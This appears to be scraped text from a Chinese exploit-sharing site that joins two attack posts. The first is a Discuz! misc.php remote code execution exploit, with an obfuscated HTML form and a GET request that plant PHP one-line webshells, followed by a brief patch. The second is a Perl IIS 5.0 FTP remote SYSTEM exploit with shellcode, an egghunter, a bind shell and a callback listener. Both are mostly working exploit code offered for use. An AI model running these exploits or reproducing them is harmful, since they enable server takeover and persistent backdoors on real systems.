<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

相关文章

• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675
• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年09月22日 -- Gnuboard 0day&Exp

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');

# 自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功
$patch = "\x7e\xd1\xf9\x7f";
$retaddr = "\x9B\xB1\xF4\x77";

# 你可以使用wordexp的这两个跳转地址
#$patch = "\x90\x80\xb7\x6f";
#$retaddr = "\xcd\x60\xb6\x6f";

# 这里也修改了, 多加了两个"K", 因为$myfindsc中
# 用了"repne scasd[edi]"指令来查找Shellcode, 多
# 加两个"K"使其四字节对齐, 否则会找不到（通用性？）
$v = "KKKSEXY" . $sc . "V" x (500-length($sc)-5);

# 溢出时堆栈的基本状况
# |0 |104 | 108 |112 |164 |168 |172 |176
#$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";

#
#void myfindsc()
#{
# __asm
# {
# int 3;
#start:
# MOV EDX,ESP;
# FCMOVNBE ST,ST(2);
# _emit 0xd9;
# _emit 0x72;
# _emit 0xf4; FSTENV [edx-0Ch]
# POP EBP;
# PUSH EBP;
# POP EBX;
# PUSH 76h;
# POP EAX;
#xorsc:
# XOR BYTE PTR DS:[EBX+28h],AL; patch "decode" 的0xff
#findsc:
# MOV EAX,66666666h;
# SUB EAX,66566666h;
# PUSH EAX;
# POP EDI;
# PUSH 21212121h;
# POP ECX;
# MOV EAX,59584553h;
# REPNE SCAS DWORD PTR ES:[EDI];
#decode:
# _emit 0x89;
# _emit 0xE7; JMP EDI
# }
#}
#
#
#void main()
#{
# myfindsc();
#}
#

# 修改用于定位Shellcode的代码, 由于该代码需要调
# 用call或者jmp等指令以跳转到Shellcode的地方, 此
# 类指令包含了0xff, 会被IIS过滤, 所以这里采用了自
# 修改的形式将0xff patch掉. 本来想要alpha2加密,
# 但是加密后内容太长.
$myfindsc =
"\x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58".
"\x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5F\x66".
"\x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59".
"\xf2\xaf\x89\xe7";

$c = $myfindsc . "A" x (104 - length($myfindsc)) .
$patch . $patch. "\xEB\x8E\x44\x44"."A" x 48 .
# |< -- 第二次跳转: 到这里后最终跳到$myfindsc
$patch . "AAAA". $retaddr . $patch . "A" x 16 ."\xE2\xAA"."NN";
# |<-- 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次

$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = < $sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = < $sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = < $sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = < $sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "MKD CCCC". "$c\r\n"; # 这里也被修改了, 多加了个C, 用于4字节对齐
$x = < $sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = < $sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = < $sock>;
print $x;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(< $new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

相关文章

• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年09月22日 -- Gnuboard 0day&Exp
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit